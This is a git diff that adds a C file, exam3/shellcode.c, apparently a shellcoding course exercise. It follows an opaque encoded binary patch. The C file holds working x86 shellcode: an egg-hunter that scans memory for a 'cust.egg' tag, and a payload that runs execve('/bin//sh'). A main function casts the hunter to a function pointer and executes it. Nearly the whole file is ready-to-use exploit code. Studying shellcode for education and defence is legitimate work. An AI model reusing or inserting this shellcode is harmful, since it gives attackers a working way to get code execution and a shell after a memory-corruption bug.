z`$X=Og1hJpb6rPs*8_#I!4ec@Z>mX};_7vCX(84~0$q6wYlLy>!&+q8mQA{L+Gw_u
zG1u8_7%QW5MN9ZVA{CBKFJzr%B@Y_VtY3~!eg~SJ{UP*0=p)dKdnVt(R^fXp=v!7A
z2pqxMT#hoz74$*Id+q#SzrU_*R_z;L2<)~(u)VXe{{UKOdwp)!vw_1U{+7|&3$+&|
zn~T+f@JTVAbwU^9dexfca4lo76#CSU13?6#n8dRE_)Z};g#D6zDMdN=u2+EPLbpNY
zLFng85GIa!1d+j6Gawu%=2UzIat!sEAA;sy6ol{{K#eY@5-3NXQtZnO=ni0H|L?^8
zUsw7!+L(*DTMD@kqRYQXUtjTPO<(UPk!;4z-s<bUZQ8L|_QS$h)yPR-)nDE`l>Zwi
za68OKCe>{lv2eOG9J39_PTQtw3RYyDs>`nix4ru*s?Do<tJO)a%{b25wVm;S_gdQq
z-f10p_sv71HW{7Xh^t${JE6XQvr&mR!)l}2tTs0q>(^DSU-#{G8;r_UJ8EnTyQ+Lm
zHFj|`bD-M|cS5^qr5&Ba#%!m1gqcjawpm-(w8jm`JQPc2&CYBbFRpl0m_$xE;|Mc)
zAc^*rcGJr8gq_aBQ^{$-f-P+)$XA)3ge%N=GLC=O?!|u>08FW9*bNKQcC4;+xZAdz
zC~9gX%!r#xXW&k$A4On9li}`o1nyF327jh(TeZ`f0XvfF?zWTe7d^^pwq-zETU?v+
z90I`grxR^VUx)C$PM$n3z+fP+la8e-6lk7<m~g-gX%e*NH6VWr>zVB_mWI6cWPE!(
za(6%&PvkMiUIDKIdBz;FvOUJy9th)%JjP@xGK@u?$Yt6OVLXw?Sn5EA@vZ%`obot?
z@y9%4FoBGLe6e3ZaS(D3ggnOZ5HbuX-5$q4oP%f{WB!=ep4>xV)4U<%*;o4Eo^uMk
zb;#>P9@Aln=1qV%0bYx=s6X;3KY?f-&#E<;B+j8uoI9qMAezTLZW5Kb=jx>W{u~A5
z!JP==MaNBWgC;?1-Y<~XJb8WuFZ4OQQ$@Te+KYns)aUSi=kfTA`Q{o2uXy9qe%~nK
z@gR`@AG|9?JihR6fT!DlX)6B*<oPV<SDvH6yX2KYNgn(0X9&kj9?xfIQE6s-#BUez
z_)ZuBZ{|FcmoMUtgEtP|%P7;y@G}2^rhoe7N#_WHk60(&hkv4g{nKlSyl-ieXQQ3(
zBDST|De!J<08I`PHP?Vn9e6o*z}dYhSOcM7t}U+l;`T=1pt`7{ZV$A(689q(s+*SD
zcNA6)aDP!)dEh>xuo^Y@3x)B}khm`>%qNQePGJlZiE&O{;>{rASz(Ssy{i@Gn_k7I
z!rY;RU>qvU9Yx5yp~5^lsI!B@^Cf2dD2zJ=65~W+6_tz!h51y}x>uMd1*{S8onGSY
z*j&fTu1-?=onPXeM7S=M{mWGHOrkJPB4~fg&Lg~9Pt+yit5j2|L@b?J2P_PTj|v<y
z<C55iTh&r%-9I1tR|%~9=feqzdq$6U_V9}`@er^)sYCnVkLNg^=lLXw9q6$le(}1Y
zf4=c1iv0Hh|J9p6A6E5qz{UQ520Vg&4hrkIOuWjBm)PEKk!O6e$cK~KAEEX5cx#-P
zf&T@p=iA5mMhEqL8e)l<2fPa7;k+yaUJT585Lade{D*+KKLbkqO<<i2WH!&hJAk=<
zI6u6T?gr+*%{mogzSvvD=W6LChW}Mi^#3$4Z!O#dhz|o7-*I06*8MMs{RHcKiS7Lw
zxZIoHh5iNN958QZq%8C=62AxL6_3x6<9mBX{f~g<)eiP@%=f3jiK6+LjSxQy%=T!X
z2VBgr0Deu6*Iy=91M@EVi097)=KGWND|mv4q+J|capQ{MB3|FVv(;*DYHP>s-Le{{
zq3!iWrfABFB~qQ?ge8w*Ryf-$aK!3K*sdKlH*9*~enEp3kM<I666z!u&31Pm(0&?s
zG)OmFT5BI}v^1g{o&U^>Jo8B}8OKf}BB`j&4sUJVSy$U^?cB1Zt+Cx|udQotWXE}?
zw8H6h_<&_6qtgrI#|dFIJhr3u;ih`QBcl5BAiSe_75MUlL?n~7<cZX?&-l7wZGXaQ
zwPW!N4$Sq5a3*7Cgw@q!IZs0IAbZz$jhdRzK5RJhjwpK6wQ%MK63Z&;m-<XnTp8v}
z%5uWVXu^gY`JD8eO?6!!tksv6>2+})o<8FBLQRt`&&!y;jSp-zW43GcL@XB_ecbHq
L74pN3oLTW-w_ec{

literal 0
HcmV?d00001

diff --git a/exam3/shellcode.c b/exam3/shellcode.c
new file mode 100644
index 0000000..8e1c0fd
--- /dev/null
+++ b/exam3/shellcode.c
@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\xeb\x1e\x58\x40\x81\x78\xf8\x63\x75\x73\x74\x75\xf6\x81\x78\xfc\x2e\x65\x67\x67\x75\xed\xff\xd0\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x63\x75\x73\x74\x2e\x65\x67\x67\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+}